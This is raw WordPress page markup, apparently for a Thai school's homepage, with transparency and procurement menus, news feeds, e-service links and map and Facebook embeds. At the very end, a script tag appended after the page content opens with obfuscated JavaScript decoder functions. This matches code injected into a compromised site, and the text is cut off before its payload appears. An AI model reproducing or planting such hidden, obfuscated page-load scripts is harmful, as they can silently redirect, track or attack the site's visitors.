style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 